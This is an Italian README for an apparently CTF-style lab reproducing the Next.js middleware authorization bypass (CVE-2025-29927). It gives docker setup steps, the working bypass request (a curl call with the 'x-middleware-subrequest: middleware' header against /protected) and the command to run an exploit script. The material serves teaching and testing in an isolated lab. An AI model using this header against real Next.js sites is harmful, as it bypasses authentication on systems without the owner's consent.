
Questa è una Proof of Concept in stile Capture The Flag (CTF) per la vulnerabilità Bypass dell'autorizzazione del middleware di Next.js (CVE-2025-29927). L'obiettivo è bypassare il middleware di autenticazione e recuperare la flag dalla route /protected.
/protected/git clone https://github.com/mhamzakhattak/CVE-2025-29927
cd CVE-2025-29927
cd nextjs-docker
sudo docker build -t nextjs-auth-app .
sudo docker run -p 3000:3000 nextjs-auth-app
Questo avvierà l'app Next.js vulnerabile su http://IP:3000
Prova ad accedere a:
curl -i http://IP:3000/protected
Verrai reindirizzato a /.
curl -H "x-middleware-subrequest: middleware" http://IP:3000/protected
Usa lo script exploit.py fornito per bypassare il middleware e accedere alla route protetta:
python3 exploit.py -url http://IP:3000
In caso di successo, recupererai la flag da /protected.
Dockerfile - Costruisce l'applicazione Next.js vulnerabileexploit.py - Sfrutta la vulnerabilità per bypassare l'autenticazionepages/ - Contiene le route vulnerabili /protected e /loginmiddleware.js - La logica del middleware vulnerabileREADME.md - Questo fileQuesta PoC è esclusivamente a scopo educativo e di ricerca. Non utilizzarla su sistemi che non possiedi o sui quali non hai ricevuto esplicita autorizzazione al test.
Trova la flag sfruttando la vulnerabilità e accedendo a:
http://IP:3000/protected
Buona fortuna! 🏴☠️